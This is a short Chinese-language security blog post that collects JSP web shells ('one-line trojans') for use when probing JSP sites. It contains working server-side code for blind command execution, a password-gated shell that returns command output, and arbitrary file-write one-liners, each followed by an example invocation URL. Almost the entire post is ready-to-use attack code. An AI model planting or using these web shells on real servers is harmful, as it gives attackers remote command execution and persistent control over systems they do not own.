JSP一句话木马

作者: const27 分类: All,JSP安全 发布时间: 2020-06-18 16:04

挖洞遇见些JSP站,JSP一句话木马还是得会吧

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
无回显命令执行
http://127.0.0.1/shell.jsp?cmd=calc
<%

   if("023".equals(request.getParameter("pwd"))){

        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();

        int a = -1;

        byte[] b = new byte[2048];

        out.print("<pre>");

        while((a=in.read(b))!=-1){

            out.println(new String(b));

        }

        out.print("</pre>");

    }

%>
带密码的有回显的一句话
http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls
<%
    // ISO-8859-1 输入
    new java.io.FileOutputStream(request.getParameter("file")).write(request.getParameter("content").getBytes());
    // UTF-8 输入
    new java.io.FileOutputStream(request.getParameter("file")).write(new String(request.getParameter("content").getBytes("ISO-8859-1"), "UTF-8").getBytes());
    // Web 目录写入
    new java.io.FileOutputStream(application.getRealPath("/") + "/" + request.getParameter("filename")).write(request.getParameter("content").getBytes());
    // 功能更加丰富的写入
    new java.io.RandomAccessFile(request.getParameter("file"),"rw").write(request.getParameter("content").getBytes());
%>
文件写入

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

Leave a Reply

Your email address will not be published. Required fields are marked *

标签云